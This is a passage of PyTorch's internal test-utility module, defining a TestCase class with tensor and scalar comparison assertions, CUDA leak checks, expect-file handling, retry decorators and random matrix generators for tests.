" To enable set the environment variable PYTORCH_RUN_DISABLED_TESTS=1")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride, for
# example.
# TODO: provide a better mechanism for generated tests to set rtol/atol.
_precision: float = 0
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS and not TEST_WITH_ROCM:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_cuda_policy(test_method, policy))
def wrap_method_with_cuda_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_cuda_policy(method, self.assertLeaksNoCudaTensors)
def setUp(self):
if TEST_SKIP_FAST:
if not getattr(self, self._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
check_disabled(str(self))
set_rng_seed(SEED)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device='cpu'):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = torch.randn(*v_size, device=device)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size))
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
r = self.safeCoalesce(t)
return r.to_dense()
def safeCoalesce(self, t):
tc = t.coalesce()
self.assertEqual(tc.to_dense(), t.to_dense())
self.assertTrue(tc.is_coalesced())
# Our code below doesn't work when nnz is 0, because
# then it's a 0D tensor, not a 2D tensor.
if t._nnz() == 0:
self.assertEqual(t._indices(), tc._indices())
self.assertEqual(t._values(), tc._values())
return tc
value_map = {}
for idx, val in zip(t._indices().t(), t._values()):
idx_tup = tuple(idx.tolist())
if idx_tup in value_map:
value_map[idx_tup] += val
else:
value_map[idx_tup] = val.clone() if isinstance(val, torch.Tensor) else val
new_indices = sorted(list(value_map.keys()))
new_values = [value_map[idx] for idx in new_indices]
if t._values().ndimension() < 2:
new_values = t._values().new(new_values)
else:
new_values = torch.stack(new_values)
new_indices = t._indices().new(new_indices).t()
tg = t.new(new_indices, new_values, t.size())
self.assertEqual(tc._indices(), tg._indices())
self.assertEqual(tc._values(), tg._values())
if t.is_coalesced():
self.assertEqual(tc._indices(), t._indices())
self.assertEqual(tc._values(), t._values())
return tg
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: support bfloat16 comparisons
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like, device=None, dtype=None):
assert TEST_NUMPY
assert dtype is not torch.bfloat16
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
a = tensor_like.detach().cpu().numpy()
t = tensor_like
else:
a = np.array(tensor_like, dtype=torch_to_numpy_dtype_dict[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
self.assertEqual(np_result, torch_result)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
atol = max(atol, self.precision)
return _compare_scalars_internal(a, b, rtol=cast(float, rtol), atol=cast(float, atol), equal_nan=equal_nan)
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified the other must be, too"
# Tensor x Number and Number x Tensor comparisons
if isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
super().assertEqual(x.is_sparse, y.is_sparse, msg=msg)
super().assertEqual(x.is_quantized, y.is_quantized, msg=msg)
if x.is_sparse:
x = self.safeCoalesce(x)
y = self.safeCoalesce(y)
indices_result, debug_msg = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result and msg is None:
assert debug_msg is not None
msg = "Sparse tensor indices failed to compare as equal! " + debug_msg
self.assertTrue(indices_result, msg=msg)
values_result, debug_msg = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result and msg is None:
assert debug_msg is not None
msg = "Sparse tensor values failed to compare as equal! " + debug_msg
self.assertTrue(values_result, msg=msg)
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result and msg is None:
assert debug_msg is not None
msg = "Quantized representations failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
else:
result, debug_msg = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result and msg is None:
assert debug_msg is not None
msg = "Tensors failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
super().assertEqual(x, y, msg=msg)
elif type(x) == set and type(y) == set:
super().assertEqual(x, y, msg=msg)
elif isinstance(x, dict) and isinstance(y, dict):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
super().assertEqual(x, y, msg=msg)
elif is_iterable(x) and is_iterable(y):
super().assertEqual(len(x), len(y), msg=msg)
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
self.assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result and msg is None:
assert debug_msg is not None
msg = "Scalars failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
else:
super().assertEqual(x, y, msg=msg)
def assertAlmostEqual(self, x, y, *, places=None, msg=None, delta=None):
prec = delta
if places:
prec = 10**(-places)
rtol = None if prec is None else 0
self.assertEqual(x, y, msg=msg, atol=prec, rtol=rtol)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def maybeWarnsRegex(self, category, regex=''):
"""Context manager for code that *may* warn, e.g. ``TORCH_WARN_ONCE``.
This filters expected warnings from the test log and fails the test if
any unexpected warnings are caught.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
# Ignore expected warnings
warnings.filterwarnings("ignore", message=regex, category=category)
try:
yield
finally:
if len(ws) != 0:
msg = 'Caught unexpected warnings:\n'
for w in ws:
msg += warnings.formatwarning(
w.message, w.category, w.filename, w.lineno, w.line)
msg += '\n'
self.fail(msg)
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
f.write(s)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id))
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "XXX"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
import subprocess
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
pipes = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
return pipes.communicate()[1].decode('ascii')
if sys.version_info < (3, 2):
# assertRegexpMatches renamed to assertRegex in 3.2
assertRegex = unittest.TestCase.assertRegexpMatches
# assertRaisesRegexp renamed to assertRaisesRegex in 3.2
assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
if sys.version_info < (3, 5):
# assertNotRegexpMatches renamed to assertNotRegex in 3.5
assertNotRegex = unittest.TestCase.assertNotRegexpMatches
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg)
def find_free_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
sockname = sock.getsockname()
sock.close()
return sockname[1]
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
matches exactly with one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
tries_remaining = 10
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if str(error) in connect_errors:
tries_remaining -= 1
if tries_remaining == 0:
raise
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
# Used in test_autograd.py and test_torch.py
def prod_single_zero(dim_size):
result = torch.randn(dim_size, dim_size)
result[0, 1] = 0
return result
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, v = A.svd()
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return u.mm(torch.diag(s)).mm(v.transpose(0, 1))
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.transpose(-2, -1)).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1))
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1)) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
def make_nonzero_det(A, sign=None, min_singular_value=0.1):
u, s, v = A.svd()
s.clamp_(min=min_singular_value)
A = torch.matmul(u, torch.matmul(torch.diag_embed(s), v.transpose(-2, -1)))
det = A.det()
if sign is not None:
if A.dim() == 2:
det = det.item()
if (det < 0) ^ (sign < 0):
A[0, :].neg_()
else:
cond = ((det < 0) ^ (sign < 0)).nonzero()
if cond.size(0) > 0:
for i in range(cond.size(0)):
A[list(cond[i])][0, :].neg_()
return A
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, v = A.svd()
s = torch.arange(1., matrix_size + 1, dtype=dtype, device=device).mul_(1.0 / (matrix_size + 1)).diag()
return u.matmul(s.expand(batch_dims + (matrix_size, matrix_size)).matmul(v.transpose(-2, -1)))
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
u, _, v = A.svd(some=False)
s = torch.zeros(rows, columns, dtype=dtype, device=device)
k = min(rows, columns)
for i in range(k):
s[i, i] = float(i + 1) / (k + 1)
if singular:
# make matrix singular
s[k - 1, k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0, 0] = 0
return u.matmul(s.expand(batch_dims + (rows, columns)).matmul(v.transpose(-2, -1)))
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
A = torch.sparse_coo_tensor(indices, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices = [icoords, jcoords]
return torch.sparse_coo_tensor(indices, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
